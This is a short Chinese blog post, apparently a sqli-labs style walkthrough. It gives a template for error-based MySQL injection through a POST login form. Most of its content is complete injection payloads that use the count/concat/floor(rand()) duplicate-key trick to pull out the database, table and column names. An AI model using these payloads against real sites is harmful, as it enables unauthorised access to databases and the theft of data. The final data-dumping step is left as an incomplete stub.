基于错误的的sql注入模版(post)

Posted 123xu

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了基于错误的的sql注入模版(post)相关的知识,希望对你有一定的参考价值。

一、报错分析
riaDBserverversionfortherightsyntaxtousenear‘))"andpassword=""LIMIT0,1‘atline1
    syntaxtousenear‘"""andpassword=""LIMIT0,1‘atline1
基于双引号
二、分析类型。
万能登录成功
三、没有回显位。
估计应该是基于错误的注释。

1、正确答案(勿改动)数据库名
uname=123" and (select 1 from (select count(*),(concat("~",database(),"~",floor(rand()*2)))name from information_schema.tables group by name)b) #&passwd=&submit=Submit

1、语句分析:
   mysql CONCAT()函数用于将多个字符串连接成一个字符串,是最重要的mysql函数之一
   (concat("~",database(),"~",floor(rand()*2))):产生报错信息

 细节决定成败

 2、暴表明
 
   database===(select table_name from information_schema.tables where table_schema=0x7365637572697479 limit 0,1)
3、暴子端
   uname=123" and (select 1 from (select count(*),(concat("~",(select column_name from information_schema.columns where table_name=0x7573657273 limit 0,1),"~",floor(rand()*2)))name from information_schema.tables group by name)b) #&passwd=&submit=Submit

 

(concat("~",(select column_name from information_schema.columns where table_name=0x7573657273 limit 0,1)
4 暴数据
   select * from * limit 0,1












以上是关于基于错误的的sql注入模版(post)的主要内容,如果未能解决你的问题,请参考以下文章

Ecshop 2.x_3.x SQL注入和代码执行漏洞复现和分析

sql注入,post 注入问题

SQL注入之sqli-labs等(安装,配置)

sql注入

基于错误的sql注入

利用cookie进行SQL注入——看来还是人工注入要熟悉才行